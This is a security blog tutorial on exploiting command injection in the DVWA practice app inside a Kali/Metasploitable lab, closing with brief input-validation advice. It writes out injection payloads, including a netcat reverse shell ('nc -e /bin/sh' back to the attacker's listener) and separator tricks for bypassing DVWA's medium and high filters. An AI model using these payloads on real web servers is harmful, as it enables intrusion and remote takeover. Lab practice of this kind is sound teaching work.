This post may contain affiliate links/ads and I may earn a small commission when you click on the links/ads at no additional cost to you. As an Amazon Affiliate, I earn from qualifying purchases. Techsphinx also participates in the StationX Affiliate program. You can read my full disclaimer here.
Command Injection Vulnerability allows you to run arbitrary operating system commands in the target web server, so if the target web server uses Windows, you can run Windows OS commands, if it uses Linux, you will be able to run Linux commands.
Now, clearly this is a critical type of vulnerability as it allows a hacker to have full system control, access sensitive data, upload/download data, edit user security levels etc.
In this post, we are going to use command injection vulnerability to gain access to the target web server through a reverse shell and we will also be covering how to secure your web server against this type of attack?
Warning: This is for educational purpose only, I or TechSphinx shall not be held responsible for your illegal actions.
- Kali Linux and Metasploitable (If you don’t know how to set up these, check out this post.)
- Able to read and understand the above written “warning”.
Start your Kali and Metasploitable Vm, and login to DVWA.
Now, Head over to command injection tab and enter the IP address to ping. (I am using the IP of my Kali machine i.e. 10.0.2.15)
You’ll see the output of the ping command.
So, before starting to exploit the vulnerability, let’s try to understand what is going on in the background.
Whenever a user enters the IP address, the web server executes it using the command:
ping -c 4 10.0.2.15
Open a Terminal in your Kali machine and try the same ping command in the terminal.
In Linux, if you have to run multiple commands in one line then we use a command separator (semicolon “;”)
Now, let’s try to exploit command injection vulnerability.
1.) Navigate to DVWA security tab and change the security level to low.
2.) Now, type the IP and “pwd” command(to show present working directory) using the separator.
10.0.2.15 ; pwd
3.) Now, let’s try to get a reverse shell. There are many ways to get a reverse shell but in this post, we are going to use “nc” (netcat).
First open a terminal and open a listener.
nc -vv -l -p 8080
nc : name of the tool we are using.
-vv : verbose, to show any output.
-l : to start listening
-p 8080 : port on which the program will listen.
Now, go to the DVWA command injection tab and enter the IP and the nc command using a separator.
10.0.2.15 ; nc -e /bin/sh 10.0.2.15 8080
nc: name of the program
-e /bin/sh: the file which we want to execute after a successful connection.
10.0.2.15: IP where our listener is running.
8080: port on which the listener is listening.
Instead of a semi-colon (;) you can also use double ampersand (&&)
10.0.2.15 && nc -e /bin/sh 10.0.2.15 8080
4.) Once, we get the reverse shell, you can use any Linux command such as “ls”, “uname -a” etc.
We’ve successfully exploited the low difficulty, now let’s try for medium difficulty level.
1.) Change DVWA security to medium.
2.) Try the exploit we used in low difficulty (with both semi-colon and double ampersands), you’ll notice it’s not working anymore as the target is now more secure.
3.) So, now we can see the target is using filters to blacklist the semicolon and double ampersand, but what about a single ampersand? Let’s see if it is working.
10.0.2.15 & dir
4.) You can see that the single ampersand is working, but there are other workarounds for this security level. We can also use pipe (“|” shift + backslash key) operator. Read more about pipe here.
Now, as we exploited the medium difficulty let’s go for high difficulty.
1.) Change DVWA security to high.
2.) Try the exploit we used in medium difficulty, it’s not working anymore, right? Obviously, the target is more secure in high difficulty.
3.) Now, the target has blacklisted all the operators, but still, there is something that is working. Yes! The pipe operator without space is working. If you click on view source button below you’ll notice it. Let’s try to exploit it using
You can type all the one-word commands like pwd, ls, dir, id, uname etc. but you cannot use the commands with an argument like uname -a, as there is a space between uname and -a, and the target is not accepting a space. So, that’s why we can’t use nc command for reverse shell in high security.
But, you can use all these one-word commands to gather info about the server and find some other vulnerabilities.
This level of security is impossible to break as it contains all the security features one should implement to secure against a command injection vulnerability on their web server.
Secure Against Command injection vulnerability.
- Analyse the user’s input.
- Use filters and regex to exclude any unexpected results.
This is what they are doing in the impossible difficulty. For example: if the target web server is accepting the IPv4 (Like in DVWA) then analyse the input and make sure that the input only has 4 numbers separated by periods (“.”) i.e. “number.number.number.number” and use filters to exclude anything else. Have a look at the impossible difficulty source code.
Now, you know how to exploit and secure command injection vulnerability. Go ahead and practice and share your opinions in the comment section.
If you like this post, then follow Techsphinx on Facebook and Twitter for more reviews, tricks, tips and tutorials.
This article needs update or correction? Report the issue here so I can update it.